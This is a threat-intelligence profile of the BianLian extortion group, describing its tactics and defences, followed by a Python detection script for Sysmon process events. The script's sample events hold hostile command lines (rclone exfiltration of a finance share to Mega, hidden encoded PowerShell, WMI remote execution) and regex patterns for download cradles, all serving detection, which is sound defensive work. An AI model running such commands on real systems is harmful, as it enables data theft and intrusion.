Ransomware Group
BianLian
Also known as: BianLian Ransomware
Status: active • First seen 2022-06 • 250+ known victims
BianLian began as a conventional encrypting ransomware operation. After security researchers released a free decryption tool in early 2023, the group changed tactics: it now exfiltrates data without encrypting anything and threatens to publish the stolen files unless the victim pays. It is extortion without the ransomware, which also means that backups and decryptors no longer help once the data has left the network.
Overview
BianLian is an extortion group that shifted from encryption-based ransomware to pure data theft and extortion in 2023. Once a public decryptor neutralised its encryptor, the group stopped encrypting altogether and now relies entirely on the threat of leaking stolen data to get paid.
Target Industries
Healthcare, Legal Services, Manufacturing, Professional Services, Financial Services, Education
How They Attack
- Exploiting exposed and vulnerable RDP services
- Exploiting ProxyShell vulnerabilities on Microsoft Exchange servers
- Logging in with valid (stolen) VPN credentials
- Living off the land with PowerShell and WMI
- Exfiltrating data with rclone to Mega.io
Notable Victims
Air Canada (2023), Multiple US law firms, Various healthcare organizations, Numerous professional services firms
How to Protect Against BianLian
1. Patch the ProxyShell vulnerabilities on internet-facing Exchange servers, and do not leave RDP or password-only VPN access exposed, since those are the group's other entry points.
2. Monitor for rclone and Mega.io cloud sync tools. Alert on rclone by the binary's original file name rather than its path, because the executable is routinely renamed, and on any connection or command line that references mega.io or mega.nz.
3. Block unauthorized cloud storage services at the egress proxy or firewall so that an exfiltration attempt fails rather than just gets logged.
4. Implement enhanced PowerShell logging: enable Script Block Logging (Event ID 4104) and Module Logging so living-off-the-land activity is recorded with the actual commands run.
5. Download the free Avast BianLian decryptor. It applies only to the older, encrypting variants; current attacks encrypt nothing, so there is nothing to decrypt and stopping the exfiltration is the only control that matters.
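The detection side of the steps above, as an added example written for this page rather than code from the page or from any vendor tooling. It runs the rules implied by the attack list (renamed rclone, rclone-style remote targets, Mega references, encoded PowerShell, WMI remote process creation) over constructed process-creation events. Field names follow Sysmon Event ID 1 (Image, OriginalFileName, CommandLine, Computer); the rule names and the sample events are assumptions made up for the example, not real captures.

```python
"""Flag BianLian-style activity in Windows process-creation telemetry:
rclone / Mega exfiltration, encoded PowerShell and WMI remote execution.

Added example, not code from the page or from the group's tooling. Event
dicts are constructed here with Sysmon Event ID 1 field names; they are
not real captures, and the rule names are illustrative.
"""
import re
from dataclasses import dataclass

# Destinations and rclone remote types the page reports BianLian using.
CLOUD_STORAGE_INDICATORS = ("mega.io", "mega.nz", "mega:")

# rclone verbs that take a remote:path argument.
RCLONE_VERBS = {"copy", "sync", "move", "copyto", "moveto", "lsd", "ls", "mkdir"}

# An rclone remote looks like "name:" or "name:path". Requiring two or more
# characters before the colon keeps Windows drive letters ("C:\...") out.
REMOTE_RE = re.compile(r"^[A-Za-z0-9_-]{2,}:")

# PowerShell -e / -enc / -EncodedCommand and common download-and-run cradles.
ENCODED_PS_RE = re.compile(r"(^|\s)-e(nc(odedcommand)?)?\s", re.IGNORECASE)
PS_CRADLE_RE = re.compile(r"downloadstring|frombase64string|iex\s*\(|invoke-expression",
                          re.IGNORECASE)


@dataclass(frozen=True)
class Alert:
    rule: str
    host: str
    command_line: str


def _is_binary(event, name):
    """True if the process is `name`, judged by PE metadata first so a renamed
    binary (rclone.exe copied as svchost.exe) is still caught."""
    return (event.get("OriginalFileName", "").lower() == name
            or event.get("Image", "").lower().endswith("\\" + name))


def check_process_event(event):
    """Return the alerts a single process-creation event triggers, in rule order."""
    alerts = []
    host = event.get("Computer", "unknown")
    cmd = event.get("CommandLine", "")
    low = cmd.lower()
    tokens = cmd.split()

    # 1. rclone itself, even when renamed on disk.
    if _is_binary(event, "rclone.exe"):
        alerts.append(Alert("rclone-execution", host, cmd))

    # 2. rclone-shaped command line (verb + remote:path) for a binary whose
    #    version resource was stripped, which rule 1 would miss.
    if (len(tokens) >= 3 and tokens[1].lower() in RCLONE_VERBS
            and any(REMOTE_RE.match(t) for t in tokens[2:])):
        alerts.append(Alert("rclone-remote-target", host, cmd))

    # 3. Any reference to Mega on the command line, whatever the binary.
    if any(ind in low for ind in CLOUD_STORAGE_INDICATORS):
        alerts.append(Alert("cloud-storage-indicator", host, cmd))

    # 4. Encoded or cradle-style PowerShell (script block logging records the
    #    decoded content later; this fires on the launch itself).
    if _is_binary(event, "powershell.exe") or _is_binary(event, "pwsh.exe"):
        if ENCODED_PS_RE.search(cmd) or PS_CRADLE_RE.search(cmd):
            alerts.append(Alert("suspicious-powershell", host, cmd))

    # 5. WMI remote process creation used for lateral movement.
    if _is_binary(event, "wmic.exe") and "/node:" in low and "process call create" in low:
        alerts.append(Alert("wmi-remote-exec", host, cmd))

    return alerts


def scan(events):
    """Run every event through the rules and return all alerts."""
    return [a for ev in events for a in check_process_event(ev)]


# Constructed sample telemetry (not real captures).
SAMPLE_EVENTS = [
    {   # rclone copied under a benign-looking name, pushing a share to Mega
        "Computer": "FS01", "Image": r"C:\ProgramData\svchost.exe",
        "OriginalFileName": "rclone.exe",
        "CommandLine": r"svchost.exe copy \\FS01\Finance mega:backup --config C:\ProgramData\r.conf",
    },
    {   # the real svchost, must not alert
        "Computer": "FS01", "Image": r"C:\Windows\System32\svchost.exe",
        "OriginalFileName": "svchost.exe",
        "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p",
    },
    {   # encoded PowerShell launched hidden
        "Computer": "WS22", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "OriginalFileName": "PowerShell.EXE",
        "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    },
    {   # WMI lateral movement to another host
        "Computer": "WS22", "Image": r"C:\Windows\System32\wbem\WMIC.exe",
        "OriginalFileName": "wmic.exe",
        "CommandLine": 'wmic /node:10.0.0.5 /user:corp\\admin process call create "cmd /c whoami"',
    },
    {   # robocopy between local drives, must not alert
        "Computer": "WS22", "Image": r"C:\Windows\System32\Robocopy.exe",
        "OriginalFileName": "robocopy.exe",
        "CommandLine": r"robocopy C:\Data D:\Backup /E",
    },
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"[{alert.rule}] {alert.host}: {alert.command_line}")
```

Rule 1 and rule 2 overlap on purpose: the first catches a renamed rclone through its PE original file name, the second catches a build with the version resource stripped through the shape of its arguments. In a real deployment the same logic goes into a SIEM query over Sysmon Event ID 1 or Security Event ID 4688 with command-line auditing enabled, and the Mega indicators belong on the egress proxy as well.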